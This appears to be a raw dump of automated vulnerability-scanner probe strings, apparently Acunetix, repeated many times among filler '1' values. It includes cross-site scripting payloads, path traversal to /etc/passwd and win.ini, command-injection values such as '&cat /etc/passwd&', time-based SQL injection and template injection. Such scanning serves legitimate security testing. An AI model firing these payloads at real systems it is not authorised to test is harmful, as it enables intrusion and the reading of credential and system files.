${@print(md5(acunetix_wvs_security_test))}\

1

1_moK9V <ScRiPt >prompt(937377)</ScRiPt>

1

file:///etc/passwd

'&dir&'

1

1

comments

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

/\../\../\../\../\../\../\../etc/passwd

http://www.acunetix.tst

1

comments/.

1

1

"&dir&"

'"

WEB-INF/web.xml

1

1

1

1

1'"()&%<ScRiPt >prompt(905577)</ScRiPt>

1

1

<!--

1

|dir

1

WEB-INF\web.xml

1

1

1

'"()&%<ScRiPt >prompt(901432)</ScRiPt>

../../../../../../../../../../windows/win.ini

1

1

'|dir

1

1

1

1_936644

1

"|dir

1

../../../../../../../../../../boot.ini

1

1

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

1

acu8801\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8801

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

acux4446\xc0\xbez1\xc0\xbcz2a\x90bcxuca4446

1

1

1<ScRiPt >prompt(928816)</ScRiPt>

................windowswin.ini

1

1

1

1<script>prompt(959242)</script>

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(931147)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

response.write(9964124*9461443)

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?937425></ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

'+response.write(9964124*9461443)+'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

&cat /etc/passwd&

1<ScRiPt >prompt(905304)</ScRiPt>

"+response.write(9964124*9461443)+"

1

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

WEB-INF/web.xml

1

1<video><source onerror="javascript:prompt(958541)">

../../../../../../../../../../etc/passwd

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

WEB-INF\web.xml

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(936831)"></g></svg>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

cat /etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<div style=width:expression(prompt(992685))>

1

`cat /etc/passwd`

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

../../../../../../../../../../etc/passwd.jpg

1

1

1

1<iframe src='data:text/html

1

1

|cat /etc/passwd#

1

1

-1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

'|'ld

1

1

${99551+99343}

1<body onload=prompt(992065)>

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1)

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

"|"ld

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(960118)>

1

)

1&n907606=v975146

1some_inexistent_file_with_long_name%00.jpg

-1))

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

1<img src=xyz OnErRor=prompt(962798)>

'

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1xknEEhr'

testasp.vulnweb.com

"

1<img/src=">" onerror=alert(928994)>

'"()

^(#$!@#$)(()))******

'

/etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

AwZDnwjW')

1

1

||cat /etc/passwd

1

1

1<ScRiPt%20>prompt(993300)</sCripT>

"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

&dir

1

1

k6Qfwemn'))

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1&lt

${@print(md5(acunetix_wvs_security_test))}

1

1

'&dir&'

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

-1

\xf6<img acu onmouseover=prompt(913823) //\xf6>

"&dir&"

1

http://hitlLOD0rmLiN.bxss.me/

${@print(md5(acunetix_wvs_security_test))}\

1

1<input autofocus onfocus=prompt(952450)>

-1)

1

acunetix_wvs_invalid_filename

1

1

|dir

<a href='http://www.acunetix.com'>website security</a>

1

file:///etc/passwd

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1))

comments

1

1

http://www.acunetix.tst

'|dir

[url=http://www.acunetix.com]website security[/url]

'"

1

lcMDdy50'

1

comments

1

1_HdIA1 <ScRiPt >prompt(960029)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

<!--

"|dir

1

comments/.

1'"()&%<ScRiPt >prompt(969183)</ScRiPt>

trSHGfAU')

1

1

1

1

1

1

WEB-INF/web.xml

1

'"()&%<ScRiPt >prompt(939100)</ScRiPt>

1

1

oq1Lwy2F'))

1

1_914460

WEB-INF\web.xml

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

acu10475\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10475

1

1

................windowswin.ini

acux9914\xc0\xbez1\xc0\xbcz2a\x90bcxuca9914

1

1<ScRiPt >prompt(968934)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<script>prompt(922986)</script>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<ScRiPt >prompt(981466)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?915547></ScRiPt>

1

1

1

1<ScRiPt >prompt(976006)</ScRiPt>

1

1

WEB-INF/web.xml

1<video><source onerror="javascript:prompt(961465)">

1

response.write(9867884*9192336)

1

1

1

1

'+response.write(9867884*9192336)+'

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(955329)"></g></svg>

WEB-INF\web.xml

1

1

&cat /etc/passwd&

"+response.write(9867884*9192336)+"

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<div style=width:expression(prompt(969347))>

1

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

1

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<iframe src='data:text/html

1

"&cat /etc/passwd&"

1

SomeCustomInjectedHeader:injected_by_wvs

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1<body onload=prompt(952645)>

../../../../../../../../../../etc/passwd.jpg

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

1

1

cat /etc/passwd

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(961078)>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1

1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

`cat /etc/passwd`

${99002+100382}

-1)

1<img src=xyz OnErRor=prompt(974175)>

1some_inexistent_file_with_long_name%00.jpg

1&n980343=v917682

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

)

1

1<img/src=">" onerror=alert(917066)>

|cat /etc/passwd#

-1))

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

!(()&&!|*|*|

1

kJ7bUpKH'

testasp.vulnweb.com

1<ScRiPt%20>prompt(957424)</sCripT>

'|'ld

lU0NY8FI')

'"()

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

^(#$!@#$)(()))******

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1&lt

'

1

"|"ld

dq2ecXxS'))

1

1

1

/etc/passwd

1

-1

1

"

\xf6<img acu onmouseover=prompt(942064) //\xf6>

1

http://hitWSEjpxKtgD.bxss.me/

1

-1)

1

${@print(md5(acunetix_wvs_security_test))}

1<input autofocus onfocus=prompt(907346)>

1

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

acunetix_wvs_invalid_filename

-1))

1

<a href='http://www.acunetix.com'>website security</a>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}\

1

"

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

[url=http://www.acunetix.com]website security[/url]

0sJIlFHv'

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

||cat /etc/passwd

comments

1

http://www.acunetix.tst

'"

6FGMXVtz')

1

1

1_wgnwF <ScRiPt >prompt(968487)</ScRiPt>

&dir

1

comments/.

<!--

'&dir&'

file:///etc/passwd

1'"()&%<ScRiPt >prompt(998951)</ScRiPt>

1

YYH7eVVY'))

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

'"()&%<ScRiPt >prompt(954546)</ScRiPt>

"&dir&"

1

1

1

1

1

1

1

|dir

1_989415

WEB-INF/web.xml

1

1

1

1

WEB-INF\web.xml

'|dir

1

1

1

../../../../../../../../../../windows/win.ini

1

"|dir

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acu2094\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2094

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

acux3923\xc0\xbez1\xc0\xbcz2a\x90bcxuca3923

1

1

................windowswin.ini

1<ScRiPt >prompt(921460)</ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<script>prompt(971924)</script>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(959260)</ScRiPt>

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?972523></ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt >prompt(963193)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

response.write(9845156*9564392)

1

&cat /etc/passwd&

1

1

1<video><source onerror="javascript:prompt(928057)">

'+response.write(9845156*9564392)+'

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

WEB-INF/web.xml

"+response.write(9845156*9564392)+"

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(966766)"></g></svg>

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1

WEB-INF\web.xml

1<div style=width:expression(prompt(917789))>

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1

cat /etc/passwd

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<iframe src='data:text/html

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

`cat /etc/passwd`

1

1

1

1

1

-1

1<body onload=prompt(987019)>

../../../../../../../../../../etc/passwd.jpg

|cat /etc/passwd#

${99535+99569}

1

1

1

'|'ld

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(963452)>

1

-1)

1

1

1

1&n900195=v986473

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"|"ld

1some_inexistent_file_with_long_name%00.jpg

-1))

)

1

1<img src=xyz OnErRor=prompt(932338)>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

1

1<img/src=">" onerror=alert(935789)>

!(()&&!|*|*|

dbKD1mbG'

'"()

'

testasp.vulnweb.com

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

^(#$!@#$)(()))******

1<ScRiPt%20>prompt(938689)</sCripT>

1

1

"

1

cOl668J7')

'

1

/etc/passwd

1&lt

1

1

1

"

||cat /etc/passwd

1

FUdTLLIs'))

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

\xf6<img acu onmouseover=prompt(970745) //\xf6>

${@print(md5(acunetix_wvs_security_test))}

1

&dir

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1

1

${@print(md5(acunetix_wvs_security_test))}\

1<input autofocus onfocus=prompt(918939)>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

http://hitwjmcV5TSe4.bxss.me/

-1)

'&dir&'

1

1

1

1

1

1

<a href='http://www.acunetix.com'>website security</a>

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

"&dir&"

acunetix_wvs_invalid_filename

-1))

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

http://www.acunetix.tst

1

[url=http://www.acunetix.com]website security[/url]

1

x3Rax6RG'

comments

|dir

1

file:///etc/passwd

1_NFsI2 <ScRiPt >prompt(969378)</ScRiPt>

1

'"

1'"()&%<ScRiPt >prompt(926698)</ScRiPt>

aEjUBijn')

/\../\../\../\../\../\../\../etc/passwd

'|dir

1

comments

1

1

1

lYC5E6Xz'))

<!--

'"()&%<ScRiPt >prompt(982979)</ScRiPt>

1

comments/.

WEB-INF/web.xml

"|dir

1

1

1

1

1

1_943112

1

WEB-INF\web.xml

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

acu2453\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2453

1

1

acux4219\xc0\xbez1\xc0\xbcz2a\x90bcxuca4219

................windowswin.ini

1<ScRiPt >prompt(917284)</ScRiPt>

1

1

1<script>prompt(981690)</script>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt >prompt(940766)</ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

response.write(9416779*9050902)

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?958184></ScRiPt>

1

'+response.write(9416779*9050902)+'

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(905492)</ScRiPt>

1

1

"+response.write(9416779*9050902)+"

1<video><source onerror="javascript:prompt(984883)">

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1

1

&cat /etc/passwd&

1

SomeCustomInjectedHeader:injected_by_wvs

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(957453)"></g></svg>

1

1

1

1<div style=width:expression(prompt(972747))>

WEB-INF/web.xml

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1<iframe src='data:text/html

"&cat /etc/passwd&"

1

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF\web.xml

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1<body onload=prompt(906842)>

${99894+99717}

1

1

../../../../../../../../../../etc/passwd

1

1

1

cat /etc/passwd

-1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(988806)>

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1&n984078=v968700

1<img src=xyz OnErRor=prompt(916321)>

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1)

`cat /etc/passwd`

1

../../../../../../../../../../etc/passwd.jpg

1

)

-1))

1some_inexistent_file_with_long_name%00.jpg

1

1<img/src=">" onerror=alert(988408)>

1

|cat /etc/passwd#

1

!(()&&!|*|*|

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

tRyBeOZM'

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'|'ld

1<ScRiPt%20>prompt(970524)</sCripT>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

xVONZl8C')

^(#$!@#$)(()))******

testasp.vulnweb.com

'

1&lt

'"()

"|"ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

1

1

Skr1yVmA'))

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

\xf6<img acu onmouseover=prompt(906169) //\xf6>

"

1

1

-1

1

1

${@print(md5(acunetix_wvs_security_test))}

1

1<input autofocus onfocus=prompt(947266)>

1

/etc/passwd

'

1

1

acunetix_wvs_invalid_filename

-1)

${@print(md5(acunetix_wvs_security_test))}\

http://hitUCNb9wGG2P.bxss.me/

<a href='http://www.acunetix.com'>website security</a>

1

"

1

-1))

comments

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

||cat /etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

[url=http://www.acunetix.com]website security[/url]

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

comments

6Aq6SJhg'

http://www.acunetix.tst

'"

1_nYYS7 <ScRiPt >prompt(973544)</ScRiPt>

1

&dir

iygO2pYh')

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

comments/.

1

<!--

1

1

1'"()&%<ScRiPt >prompt(999130)</ScRiPt>

foNaQLAX'))

'&dir&'

1

1

1

1

"&dir&"

1

'"()&%<ScRiPt >prompt(951882)</ScRiPt>

1

file:///etc/passwd

1

1

1

1

1

1_969273

|dir

1

1

/\../\../\../\../\../\../\../etc/passwd

'|dir

1

acu6258\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6258

WEB-INF/web.xml

1

1

"|dir

acux5076\xc0\xbez1\xc0\xbcz2a\x90bcxuca5076

1

1

WEB-INF\web.xml

1

1

1

1<ScRiPt >prompt(961311)</ScRiPt>

../../../../../../../../../../windows/win.ini

1

1<script>prompt(995227)</script>

1

1

1

1

1<ScRiPt >prompt(926612)</ScRiPt>

../../../../../../../../../../boot.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?994640></ScRiPt>

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(967280)</ScRiPt>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<video><source onerror="javascript:prompt(911700)">

1

................windowswin.ini

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(970811)"></g></svg>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<div style=width:expression(prompt(971846))>

1

1

1<iframe src='data:text/html

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<body onload=prompt(951569)>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(974638)>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<img src=xyz OnErRor=prompt(973712)>

1

1

WEB-INF/web.xml

1<img/src=">" onerror=alert(980938)>

1

WEB-INF\web.xml

1

1<ScRiPt%20>prompt(971197)</sCripT>

1

1

1

1&lt

1

1

1

\xf6<img acu onmouseover=prompt(946679) //\xf6>

1

1

1<input autofocus onfocus=prompt(979489)>

1

<a href='http://www.acunetix.com'>website security</a>

1

1

[url=http://www.acunetix.com]website security[/url]

1

1_oNcuQ <ScRiPt >prompt(967704)</ScRiPt>

1

1

1

1

1

1

1

1

1

1

1

1

response.write(9157531*9453350)

1

1

&cat /etc/passwd&

'+response.write(9157531*9453350)+'

1

'&cat /etc/passwd&'

"+response.write(9157531*9453350)+"

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

1

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1

`cat /etc/passwd`

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

|cat /etc/passwd#

../../../../../../../../../../etc/passwd

-1

1

'|'ld

1

1

-1)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"|"ld

${100020+100087}

1

1

../../../../../../../../../../etc/passwd.jpg

-1))

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1&n920605=v901561

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

PBL4ZVfT'

1some_inexistent_file_with_long_name%00.jpg

)

1

'

1

Uu1XQCCQ')

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

!(()&&!|*|*|

"

'"()

waILkl1V'))

/../..//../..//../..//../..//../..//etc/passwd.jpg

^(#$!@#$)(()))******

testasp.vulnweb.com

1

-1

'

1

||cat /etc/passwd

-1)

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"

1

&dir

1

1

-1))

/etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

1

3x2NfiDA'

'&dir&'

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

http://hitqREw8UXzgf.bxss.me/

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

EabtitdH')

1

acunetix_wvs_invalid_filename

1

"&dir&"

9kaSZDtE'))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

|dir

comments

http://www.acunetix.tst

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

'"

'|dir

1

comments

1'"()&%<ScRiPt >prompt(900452)</ScRiPt>

"|dir

1

<!--

1

'"()&%<ScRiPt >prompt(904432)</ScRiPt>

1

comments/.

1

1

file:///etc/passwd

1

1

1

1_995894

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

WEB-INF/web.xml

1

1

1

WEB-INF\web.xml

1

1

1

1

../../../../../../../../../../windows/win.ini

1

acu8965\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8965

1

1

../../../../../../../../../../boot.ini

acux8626\xc0\xbez1\xc0\xbcz2a\x90bcxuca8626

1

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(943745)</ScRiPt>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<script>prompt(974618)</script>

1

1

1<ScRiPt >prompt(922607)</ScRiPt>

1

................windowswin.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?982543></ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

response.write(9932361*9188540)

1<ScRiPt >prompt(961592)</ScRiPt>

1

'+response.write(9932361*9188540)+'

&cat /etc/passwd&

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<video><source onerror="javascript:prompt(967599)">

1

"+response.write(9932361*9188540)+"

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(901706)"></g></svg>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<div style=width:expression(prompt(932275))>

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1<iframe src='data:text/html

1

1

`cat /etc/passwd`

1

../../../../../../../../../../etc/passwd.jpg

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

WEB-INF/web.xml

1<body onload=prompt(911428)>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1

|cat /etc/passwd#

1

${100255+100341}

WEB-INF\web.xml

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(990898)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

'|'ld

1

-1)

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<img src=xyz OnErRor=prompt(969010)>

1&n904142=v961888

-1))

)

"|"ld

1

1

1

1<img/src=">" onerror=alert(987593)>

1some_inexistent_file_with_long_name%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

HBZrClsx'

1

!(()&&!|*|*|

rkgkHOsi')

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<ScRiPt%20>prompt(952579)</sCripT>

/etc/passwd

'

1

^(#$!@#$)(()))******

'"()

guJ9j7bQ'))

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1&lt

testasp.vulnweb.com

'

"

1

1

1

-1

1

||cat /etc/passwd

"

1

\xf6<img acu onmouseover=prompt(948950) //\xf6>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

-1)

1

&dir

${@print(md5(acunetix_wvs_security_test))}

